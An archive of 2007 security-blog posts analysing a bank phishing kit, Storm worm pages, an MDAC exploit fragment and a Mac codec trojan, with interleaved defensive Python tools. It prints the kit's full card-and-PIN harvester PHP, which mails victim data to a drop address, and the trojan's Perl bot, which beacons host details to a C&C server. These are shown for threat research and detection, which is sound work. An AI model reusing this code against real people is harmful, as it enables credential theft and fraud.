Monday, November 19, 2007

Walking through a phish site.

I just received this email in my inbox and figured some readers would enjoy some light reading.

Online Banking

Dear Regions Bank member,


We'd like to inform you that your Message Center has 1 new message. Please log in immediately and read the message. The Message Center contains only important information about your account and online banking.

Please follow this link in order to read your message:

http://tinyurl.com/2qzwsr

Choosing to ignore this message will result in a temporary suspension of your account within 24 hours, until you will choose to solve this unpleasant situation.

Sincerely,
RegionsNet Online Banking
All of my phish emails go to CastleCops, and I enjoy helping them out by doing the first bit of research on my own. I started by figuring out where the TinyURL is pointing. You can do this by setting a cookie "preview=1" before visiting the page, fetching the page with wget, or running a proxy like Paros or WebScarab. According to TinyURL, the 2qzwsr redirect points to "http:// backup.iirt .net/ icons/ www.regions bank.com/ EBanking/ logon/" where we are greeted with:


Now phishers aren't the brightest bunch. In fact the majority of them are downright stupid. By backing up a few directories, we're able to find an open index. It was probably accidentally left open by the webmaster. The stupid part is, the phisher didn't even bother to remove his kit: "http://backup. iirt.net/ icons/ regions.tgz"
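Tracing the shortener by hand, as the post does with TinyURL's preview cookie, is the safe way to learn where a link lands without ever rendering the landing page. The script below is an added example (not from the post): it follows Location headers one hop at a time with redirects disabled, caps the hop count, detects loops, and defangs the result for a report. The http_hop fetcher does real HEAD requests with the preview=1 cookie; the FAKE_RESPONSES table is a constructed stand-in for the network (the first hop is the redirect the post reports, the second hop to index.php is made up) so the script runs offline.

```python
import http.client
from urllib.parse import urljoin, urlsplit

MAX_HOPS = 10


def http_hop(url):
    """One request, redirects deliberately NOT followed. Returns (status, Location or None).

    The preview=1 cookie is TinyURL's own "show me the target instead of
    redirecting" switch mentioned in the post; other shorteners ignore it."""
    parts = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.netloc, timeout=10)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    conn.request("HEAD", path, headers={"Cookie": "preview=1", "User-Agent": "redirect-tracer/0.1"})
    resp = conn.getresponse()
    location = resp.getheader("Location")
    conn.close()
    return resp.status, location


def resolve_chain(url, fetch=http_hop, max_hops=MAX_HOPS):
    """Walk Location headers one hop at a time; stop on a non-3xx, a loop, or max_hops.
    Returns every URL in the chain, in order, so each host can be reported."""
    chain = [url]
    seen = {url}
    for _ in range(max_hops):
        status, location = fetch(chain[-1])
        if not (300 <= status < 400) or not location:
            break
        nxt = urljoin(chain[-1], location)  # Location may be relative
        chain.append(nxt)
        if nxt in seen:  # redirect loop: record it once and stop
            break
        seen.add(nxt)
    return chain


def defang(url):
    """Render a URL so it cannot be clicked by accident (hxxp / [.] convention)."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


# Constructed stand-in for the network so the script runs offline: the first hop
# is the redirect reported in the post, the second (to index.php) is made up.
FAKE_RESPONSES = {
    "http://tinyurl.com/2qzwsr": (301, "http://backup.iirt.net/icons/www.regionsbank.com/EBanking/logon/"),
    "http://backup.iirt.net/icons/www.regionsbank.com/EBanking/logon/": (302, "index.php"),
    "http://backup.iirt.net/icons/www.regionsbank.com/EBanking/logon/index.php": (200, None),
}


def fake_fetch(url):
    return FAKE_RESPONSES.get(url, (404, None))


if __name__ == "__main__":
    for hop in resolve_chain("http://tinyurl.com/2qzwsr", fetch=fake_fetch):
        print(defang(hop))
```

Swap fake_fetch for the default http_hop to trace a live link; HEAD rather than GET keeps you from pulling down whatever sits at the end of the chain.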

In the archive we find: /www.regionsbank.com/EBanking/logon/done.php:

<?php
session_start();

// Username and password were captured by the earlier logon page and parked in the session
$j_username = $_SESSION['j_username'];
$j_password = $_SESSION['j_password'];
// Everything else comes from the "verify your details" form that posts here
$name = $HTTP_POST_VARS['name'];
$address = $HTTP_POST_VARS['address'];
$city = $HTTP_POST_VARS['city'];
$state = $HTTP_POST_VARS['state'];
$zip = $HTTP_POST_VARS['zip'];
$p1 = $HTTP_POST_VARS['p1'];
$p2 = $HTTP_POST_VARS['p2'];
$p3 = $HTTP_POST_VARS['p3'];
$card = $HTTP_POST_VARS['card'];
$expm = $HTTP_POST_VARS['expm'];
$expy = $HTTP_POST_VARS['expy'];
$cvv = $HTTP_POST_VARS['cvv'];
$pin = $HTTP_POST_VARS['pin'];
$ip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
$date = date("D M d, Y g:i a");

//sending email info here
$subj = "| CC: $card | EXP: $expm/$expy | CVV: $cvv | PIN: $pin |";
$msg = "Username: $j_username\nPassword: $j_password\nCardHolder Name: $name\nAddress: $address\nCity: $city\nState: $state\nZip: $zip\nPhone Number: $p1-$p2-$p3\nCredit Card Number: $card\nExpiration Date: $expm / $expy\nCvv: $cvv\nPin: $pin\n\n[ IP: $ip | $date ]";
$from = "From: Regions Bank";
// Drop mailbox: every harvested field goes straight to the phisher
mail("peacolo3@yahoo.com", $subj, $msg, $from);
// Bounce the victim to the real bank so nothing looks wrong
header("Location: http://www.regions.com");

?>
So victim data is emailed to peacolo3@yahoo.com. We could send Mr Peacolo a nice email, but that could be considered baiting him... and we'd never do that, right? :)
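Pulling the drop address and the post-submit redirect out of a kit is the first thing to record when one turns up, and it is worth doing without ever unpacking the archive onto disk. The following is an added example (my own code, not from the post or the kit): it walks a .tgz in memory, scans each PHP member for the recipient of mail() and for header("Location: ...") targets, and reports them per file. The sample kit it builds is constructed from a trimmed copy of the done.php above plus a decoy image; the regexes assume the kit author used literal strings or a plain variable as the first mail() argument.

```python
import io
import re
import tarfile

# PHP mail(): the first argument is the recipient. Match a double- or single-quoted
# literal, or a bare variable ($to) so the analyst knows to chase it by hand.
MAIL_CALL = re.compile(r"\bmail\s*\(\s*(?:\"([^\"]*)\"|'([^']*)'|(\$\w+))", re.IGNORECASE)
# header("Location: ...") tells you where the victim is bounced after submitting.
HEADER_LOCATION = re.compile(r"\bheader\s*\(\s*[\"']Location:\s*([^\"']+)[\"']", re.IGNORECASE)
PHP_SUFFIXES = (".php", ".inc", ".php3", ".phtml")


def scan_php(source):
    """Return (drop_addresses, redirect_targets) for one PHP source text."""
    drops = {m.group(1) or m.group(2) or m.group(3) for m in MAIL_CALL.finditer(source)}
    redirects = set(HEADER_LOCATION.findall(source))
    return drops, redirects


def scan_kit(tgz_bytes):
    """Read every PHP file inside a .tgz kit in memory (never extract a kit to disk)
    and return {member_name: {"drops": [...], "redirects": [...]}} for files with findings."""
    findings = {}
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile() or not member.name.lower().endswith(PHP_SUFFIXES):
                continue
            handle = tar.extractfile(member)
            if handle is None:
                continue
            source = handle.read().decode("utf-8", errors="replace")
            drops, redirects = scan_php(source)
            if drops or redirects:
                findings[member.name] = {"drops": sorted(drops), "redirects": sorted(redirects)}
    return findings


# Constructed sample kit: a trimmed copy of the done.php shown in the post plus a decoy
# image, packed into a .tgz in memory.
DONE_PHP = b"""<?php
session_start();
$j_username = $_SESSION['j_username'];
$card = $HTTP_POST_VARS['card'];
$subj = "| CC: $card |";
$msg = "Username: $j_username\\nCredit Card Number: $card";
$from = "From: Regions Bank";
mail("peacolo3@yahoo.com", $subj, $msg, $from);
header("Location: http://www.regions.com");
?>
"""


def build_sample_kit():
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in (
            ("www.regionsbank.com/EBanking/logon/done.php", DONE_PHP),
            ("www.regionsbank.com/EBanking/logon/logo.gif", b"GIF89a"),
        ):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for path, hit in scan_kit(build_sample_kit()).items():
        print(path, "drops:", hit["drops"], "redirects:", hit["redirects"])
```

Point scan_kit at the bytes of a real kit (open(path, "rb").read()) and the drop addresses are what you hand to the mail provider and to CastleCops along with the phish itself.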

Emails were sent to hostmaster@iirt.net and the phish was forwarded to CastleCops.

So grab your line, and go anti-phishing. -- For what it's worth, TinyURL killed the site while I was writing this. Good job TinyURL.


Saturday, November 17, 2007

Matt Jonkman is leaving Bleeding Threats

After five years, Matt has decided it is best to leave Bleeding Threats. A message posted to several mailing lists said:

After nearly 5 years as the founder and admin of Bleeding Edge Threats I
must step out of the project.

Sensory Networks, as many of you know, has very generously provided the
financial support that's made it possible for me to keep Bleeding
Threats up and running over the last 12 months. My sincere thanks to
them for this time, we've made some great things come to be in the open
security community!

Unfortunately I must step away from running Bleeding Threats, but wish
Sensory Networks all the best for the future. I'm sure that between the
community and Sensory the site can continue to grow and be a great resource.

Any questions about the future of Bleeding Threats should be directed to
the mailing lists and Sensory will soon post a direct contact. As always
for technical issues keep them flowing to the lists.

As for me, I'll still be in the community, starting something new,
please keep an eye out! I'll be as always at jonkman at jonkmans dot net,
please stay in touch!

Matt Jonkman
I'm sorry to see Matt leave. Many of you may know that he helped Shadowserver Foundation get off the ground back in 2004 by hosting the website. Matt is a good friend, and I look forward to hearing about his future endeavors. If you have time, send him a word of encouragement and thanks for all his time supporting Bleeding Edge Threats!

Thursday, November 15, 2007

Stormworm using Geocities.

The Storm authors have updated their spam templates again. The spam links to several dozen Geocities pages.

Within the Geocities pages is some pretty poorly encoded Javascript. It decodes to:
<script type="text/javascript">
if (top.location != location) {
top.location.href = document.location.href ;
}
window.location = "http:// 58.65.238. 36/ aes/"
</script>

(Spaces added to prevent accidental clicks)

That site opened by the Javascript looks like this:


The links would have you download iPIX-install.exe (md5: d23355080a5c4705300a617c864df35c) which creates and runs the file %system32%\ntos.exe on each reboot.

Anubis is perhaps the best public sandbox system I've seen. Their report on this file can be found here.


Thursday, November 08, 2007

CME711-Track Beta

Several people are interested in learning more about CME711 and generally how to track botnets. I fully respect and encourage that curiosity with one caveat: you will get attacked, and Storm may not be the best starter botnet.

If the bad guys are half as good as I suspect they are, they already know how I am downloading their binaries, and they don't care or there is nothing they can do about it. Furthermore, it's easier to hide in plain sight, so I've made a decision to open some code up to everyone. It really isn't all that special and others are probably using similar code. For someone new to this fight, it may be the jump start you need. Good botnet monitoring skills are in high demand.

Originally we ran FakeSMTP (an email honeypot) and forced the Storm binaries to communicate with that SMTP server instead of using public relays. FakeSMTP would capture the body of the message, which had the download link. I had a script automatically parse and download the binaries, but that was slow and clunky. It also relied on my node being used as a spam proxy, which was happening less frequently.

Additionally that meant I had to run the binary. Running the binary is risky. For example, you could participate in denial of service attacks. Even with rate limiting, you still run the risk of doing harm. It's certainly not recommended for those who are new to the arena.

CME711-Track is a PERL script I hacked together for tracking the Peacomm/Storm/Peed/Nuwar trojans. Similar code has been used by DISOG since July 2007. While I modified the code slightly for public release, the general function is the same. The script is very simple: it contacts CME711's servers and tries to download a binary. If successful, it saves the file and adds a time-stamp to the log. Such logs can be used as blocklists, or to track infected hosts.
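The useful output of a tracker like this is the log, not the binaries, so here is an added example (my own Python, not part of CME711-Track, whose log layout the post does not show) of turning such a log into a blocklist. It assumes a constructed format of one line per attempt, timestamp, peer address, OK/FAIL and the MD5 of whatever came back; it drops malformed lines rather than guessing, only lists peers that actually served a file, records first/last seen and distinct samples per peer, and lets you require a minimum hit count before a host is blocked.

```python
import ipaddress
from datetime import datetime

# Constructed log format (the real CME711-Track log layout is not shown in the post):
#   <YYYY-MM-DD> <HH:MM:SS> <peer_ip> <OK|FAIL> [<md5 of the fetched file>]
SAMPLE_LOG = """\
2007-11-08 14:02:11 203.0.113.17 OK aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
2007-11-08 14:02:19 203.0.113.42 FAIL
2007-11-08 14:05:03 198.51.100.9 OK aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
2007-11-08 15:10:44 203.0.113.17 OK bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
2007-11-08 15:11:00 not-an-ip OK cccccccccccccccccccccccccccccccc
garbage line
2007-11-09 02:00:00 203.0.113.42 OK aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
"""


def parse_log(text):
    """Turn log text into records, dropping malformed lines instead of guessing."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        try:
            ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S")
            ip = str(ipaddress.ip_address(parts[2]))
        except ValueError:
            continue
        ok = parts[3] == "OK"
        md5 = parts[4].lower() if ok and len(parts) > 4 else None
        records.append({"ts": ts, "ip": ip, "ok": ok, "md5": md5})
    return records


def build_blocklist(records, min_hits=1):
    """Peers that actually served a binary at least min_hits times, with first/last seen
    and the set of distinct samples. A FAIL alone never lands a host on the list."""
    hosts = {}
    for rec in records:
        if not rec["ok"]:
            continue
        host = hosts.setdefault(rec["ip"], {"first": rec["ts"], "last": rec["ts"], "hits": 0, "samples": set()})
        host["first"] = min(host["first"], rec["ts"])
        host["last"] = max(host["last"], rec["ts"])
        host["hits"] += 1
        if rec["md5"]:
            host["samples"].add(rec["md5"])
    return {ip: h for ip, h in hosts.items() if h["hits"] >= min_hits}


def render_blocklist(hosts):
    """One line per host, sorted numerically by address, in a form a firewall script can consume."""
    lines = []
    for ip in sorted(hosts, key=ipaddress.ip_address):
        h = hosts[ip]
        lines.append(
            f"{ip} # hits={h['hits']} first={h['first']:%Y-%m-%d %H:%M} "
            f"last={h['last']:%Y-%m-%d %H:%M} samples={len(h['samples'])}"
        )
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_blocklist(build_blocklist(parse_log(SAMPLE_LOG))))
```

Peers in a peer-to-peer botnet are mostly infected home machines on dynamic addresses, so age the list (the last-seen field) rather than blocking forever.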

I overly commented the code on purpose. I had hoped those new to PERL and the world of botnet tracking would download it and learn how things work. Plain text readable comments and code encourage additional research.

There are zero license restrictions on this script. Anyone is welcome to run it, for as long as you wish. I hope you would consider mentioning DISOG in any research/postings; however if you don't, my feelings aren't likely to be hurt.

Script requirements: see "readme.txt" for more information. The code will not run if you don't follow the directions included in the readme. I did that on purpose - I believe if you can't read, you shouldn't be tracking botnets.

WARNING: This script will attempt to download live malware and no support is provided. You assume all risks associated with downloading malware, or pissing off the botnet operators. This includes denial of service attacks. I tried to comment the code as much as possible, and you're welcome to send questions via email. I will do my best to answer them in a timely manner.

http://www.disog.org/public/CME711-Track.zip
(MD5: ac85bf1b06be2653c6e647b839c5a9b9 ) (SHA1: b4c93d489693616a8150e607d4b7e98ca1b2ec61)

Be smart! This code should run on any operating system with a PERL interpreter, which includes Windows. However, it will download real malware. The risk of accidentally running this code on a Windows machine is high. I don't recommend it. Run it on Linux, Mac, or a virtual Windows machine. You'll be wasting a lot of time cleaning up your machine - not to mention looking like an idiot - if you don't follow this simple warning.


Wednesday, November 07, 2007

New style, same old exploits

The witches and goblins of storm have not finished their Halloween wrath.

At about 1300 hrs, UTC on November 7th, the xor’d mpack javascript was replaced with an iframe:

http://removed.for.your.protection/cgi-bin/in.cgi?p=user1" height="0" width="0"

This iframe redirects you to some heavily layered javascript. After peeling back the layers, the finished product looks like this:

…snip…
function startMDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://removed.for.your.protection/cgi-bin/in.cgi?u2_1_600_2_0_870665223_2792316769_2354152789';
}
…snip…

The link in the urlRealExe variable is formally known as file.php. It is a downloader which grabs sony.exe and connects to the network.

There has been no change in the social engineering vectors, but the attempts to hide their exploit in layered javascript are new and might confuse antivirus.

Update: The servers are now responding with 500 (Internal Server Errors) when trying to access the /cgi-bin/in.cgi file.

Update 2: The new filename is dancer.exe. The email body provided to me has the word 'plain' incorrectly spelled as plane.


Thursday, November 01, 2007

Mac Codec Trojan

Sunbelt is reporting about a codec style trojan targeted towards Mac users.

Alex from Sunbelt was kind enough to provide several researchers (and me) with links to this trojan. It appears that depending on your user agent (either Mac or Windows) you will be served a different version of the binary. We will not be linking to the binary at this time, and I will be focused on the Mac version, since that is the one getting all the attention.

The package is titled MacCodec, and does require your administrator password to mount. The default install location is /Library/Internet Plug-Ins/ and it comes with a pretty license agreement:

SOFTWARE INSTALLATION: Components bundled with our software may report to Licensor and/or its affiliates the installation status of certain marketing offers, such as toolbars, and also generalized installation information, such as language preference and operating system version, to assist Licensor in its product development. No personal information will be communicated to Licensor or its affiliates during this process. Licensor reserves the right to install additional components through its check/update system. These components could include Toolbar, Pop-up advertising solution, Commercial homepage manager, Commercial messenger and could modify some of your network settings.

PreInstall Script:

#!/bin/bash
s1=85.255.116.156
s2=85.255.112.15
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')

PostInstall Script:

#!/bin/sh
path="/Library/Internet Plug-Ins/"
/usr/bin/perl "$path/sendreq"
rm -rf "$path/sendreq"
Well commented perl bot:

#!/usr/bin/perl
use IO::Socket;

# The "comments" are MIME::Base64's pure-Perl encoder, pasted in wholesale
sub encode_base64 ($;$)
{
    if ($] >= 5.006) {
        require bytes;
        if (bytes::length($_[0]) > length($_[0]) ||
            ($] >= 5.008 && $_[0] =~ /[^\0-\xFF]/))
        {
            require Carp;
            Carp::croak("The Base64 encoding is only defined for bytes");
        }
    }
    use integer;
    my $eol = $_[1];
    $eol = "\n" unless defined $eol;
    my $res = pack("u", $_[0]);
    # Remove first character of each line, remove newlines
    $res =~ s/^.//mg;
    $res =~ s/\n//g;
    $res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
    # fix padding at the end
    my $padding = (3 - length($_[0]) % 3) % 3;
    $res =~ s/.{$padding}$/'=' x $padding/e if $padding;
    # break encoded string into lines of no more than 76 characters each
    if (length $eol) {
        $res =~ s/(.{1,76})/$1$eol/g;
    }
    return $res;
}

# C&C host; the "bot" is a single check-in
my $server="85.255.121.37";
# CPU type and hostname, joined with ";" and flattened onto one line
my $cmd=`uname -p;echo ";";hostname`;
$cmd=~s/\n//g;
# Victim fingerprint "mac;<arch>;<hostname>", base64'd so it can ride in a header
my $uniqid=encode_base64("mac;".$cmd);
$uniqid=~s/\n//g;
# The beacon is smuggled out in the Accept-Language header of an ordinary-looking GET
my $request="GET / HTTP/1.1\r\nAccept-Language: $uniqid\r\nHost: $server\r\n\r\n";
my $socket=IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>80,Proto=>"tcp",timeout=>10) or die();
print $socket $request;
close($socket);

So, this Trojan requires the user to enter their password for install - which probably won't seem suspicious to the unsuspecting user, since a lot of software requires an administrator password for install. It then changes the DNS entries to 85.255.116.156 and 85.255.112.15 and attempts to make contact with an HTTP-based C&C at 85.255.121.37. You might want to think twice about installing suspicious looking codecs - porn just isn't that good.

The DNS servers point every invalid query (and probably a few valid porn sites) to 216.255.187.215 which Bleeding Edge recommends you block.
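Two things from this sample are cheap to detect on the wire and on the host: the check-in, whose Accept-Language header is a base64 blob that decodes to "mac;<arch>;<hostname>" rather than a language tag, and the rogue resolvers the installer writes. The following is an added example (my own code, not from the post or the sample) that does both: decode_beacon/find_beacons run over constructed proxy log lines of the form <timestamp> <client> <destination> <accept-language>, and rogue_resolvers checks resolv.conf-style text against the two DNS addresses the post names. The log format, client addresses and hostnames are constructed; the indicator addresses are the post's.

```python
import base64
import ipaddress

# Indicators taken from the post: the DNS servers the installer configures and the C&C host.
ROGUE_DNS = {"85.255.116.156", "85.255.112.15"}
CNC_HOST = "85.255.121.37"


def decode_beacon(accept_language):
    """If an Accept-Language value is really the bot's base64 'mac;<arch>;<hostname>' blob,
    return (arch, hostname); otherwise None. Real language tags ("en-US,en;q=0.8", "de")
    are not valid base64 of the right shape and fall through to None."""
    try:
        raw = base64.b64decode(accept_language.strip(), validate=True)
        text = raw.decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    parts = text.split(";")
    if len(parts) != 3 or parts[0] != "mac":
        return None
    return parts[1], parts[2]


def find_beacons(log_lines):
    """Scan constructed proxy log lines: <ts> <client_ip> <dest_host> <accept_language>.
    Flags the check-in wherever it goes; known_cnc marks the address named in the post."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) != 4:
            continue
        ts, client, dest, lang = fields
        decoded = decode_beacon(lang)
        if decoded:
            arch, host = decoded
            hits.append({"ts": ts, "client": client, "dest": dest, "arch": arch,
                         "victim_host": host, "known_cnc": dest == CNC_HOST})
    return hits


def rogue_resolvers(resolv_conf):
    """Return nameserver entries in resolv.conf-style text that match the post's rogue DNS IPs."""
    found = []
    for line in resolv_conf.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            try:
                ip = str(ipaddress.ip_address(parts[1]))
            except ValueError:
                continue
            if ip in ROGUE_DNS:
                found.append(ip)
    return found


def _beacon(arch, host):
    # Builds a header value the way the bot does (base64 of "mac;<arch>;<host>"),
    # only to populate the constructed sample log below.
    return base64.b64encode(f"mac;{arch};{host}".encode()).decode()


# Constructed sample log: two infected clients, two ordinary browsers.
SAMPLE_LOG = [
    f"2007-11-01T10:00:00Z 192.0.2.10 85.255.121.37 {_beacon('i386', 'imac.local')}",
    "2007-11-01T10:00:05Z 192.0.2.11 www.example.com en-US,en;q=0.8",
    "2007-11-01T10:00:09Z 192.0.2.12 www.example.com de",
    f"2007-11-01T10:01:00Z 192.0.2.13 203.0.113.5 {_beacon('powerpc', 'studio-g5.local')}",
]

# Constructed resolver config after the installer has run.
SAMPLE_RESOLV = "nameserver 85.255.116.156\nnameserver 85.255.112.15\nnameserver 192.0.2.1\n"


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
    print("rogue resolvers:", rogue_resolvers(SAMPLE_RESOLV))
```

Matching on the decoded header shape rather than on the C&C address is the point: the address will change, the beacon format is what the author had to build into the script.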

As expected, this is getting all sorts of attention from ISC. It's also sparked the Mac lovers vs haters debate on several forums. It really isn't all that special, just a Perl script packed in a dmg file. PerlBots have worked on Mac for ages now. While the thought of infecting a Mac or Linux box is sexy, this is hardly news. With that said, I do like the public attention Macs are getting, with regards to security. Regardless of operating system, users should remain on guard and prepared to use their common sense at all times.
